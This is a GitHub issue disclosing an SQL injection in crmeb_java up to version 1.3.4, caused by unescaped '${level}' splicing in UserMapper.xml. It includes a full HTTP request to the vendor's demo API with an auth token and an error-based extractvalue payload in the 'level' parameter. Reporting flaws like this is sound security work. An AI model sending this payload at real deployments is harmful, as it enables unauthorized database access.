Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

There is a sql injection vulnerability exists in crmeb_java #9

Open
xiaoliangli1128 opened this issue Jan 30, 2023 · 0 comments
Open

Comments

@xiaoliangli1128
Copy link

[Suggested description]
sql injection vulnerability exists in crmeb_java <=1.3.4
/api/admin/user/list endpoint Unfiltered parameters 'level' cause sqli

[Vulnerability Type]
SQLi

[Vendor of Product]
https://github.com/crmeb/crmeb_java

[Affected Product Code Base]
<=1.3.4

[Affected Component]

GET /api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a% HTTP/2
Host: api.java.crmeb.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authori-Zation: 0d8ed99c6e51404f82a22ba15332300a
Origin: https://admin.java.crmeb.net
Referer: https://admin.java.crmeb.net/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-site
Te: trailers

[Attack Type]
Remote

[Vulnerability details]
step 1 login admin click user Manager and click search button
图片

step 2 intercept request use burpsuite
图片

step 3 insert payload in paramter “level”

level=1+and+extractvalue(1,CONCAT(1,user()))

https://api.java.crmeb.net/api/admin/user/list?labelId=&userType=routine&sex=&isPromoter=&country=&payCount=9&accessType=0&dateLimit=&keywords=&province=&city=&page=1&limit=15&level=1+and+extractvalue(1,CONCAT(1,user()))&groupId=1&temp=1675070029&addres=a%

图片

there you can see it

[Impact Code execution]
true
[Cause of vulnerability]
\crmeb\crmeb-service\src\main\resources\mapper\user\UserMapper.xml
line 36 "${level}"
When using "${}", program will do not do any processing, and directly splice the value into the sql statement lead sqli
图片

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant